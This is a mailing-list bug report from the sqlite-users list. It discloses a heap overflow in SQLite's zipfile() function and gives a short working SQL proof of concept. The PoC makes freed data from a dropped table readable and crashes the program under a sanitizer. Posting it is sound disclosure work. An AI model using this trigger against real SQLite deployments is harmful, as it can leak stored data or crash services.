[sqlite] Heap overflow leads to crashing or memory dumping(possibly database leaking)

Yongheng Chen Mon, 23 Dec 2019 12:13:39 -0800

Hi,

We found a heap overflow bug in sqlite, which leads to crashing and memory 
dumping. 
Here is the PoC:
—
create table v0(v1 char);
insert into v0 values ('1');
create table v2(v3 text);
insert into v2 values 
("111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"),
 ("2222222222222222222222222222222222222222222222222"), 
("3333333333333333333333333333333333333");
drop table v2;
insert into v0 select zipfile(v1, NULL) from v0;
insert into v0 select zipfile(v1, NULL) from v0;
insert into v0 select zipfile(v1, NULL) from v0;
select hex(v1) from v0;
—
From the hex result we can spot the data in the deleted table v2. And if we run 
it with address sanitizer, we get a heap overflow crash.


The bug exists in the update to date release code and the development code.


Yongheng & Rui
_______________________________________________
sqlite-users mailing list
[email protected]
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Heap overflow leads to crashing or memory dumping(possibly database leaking)

Reply via email to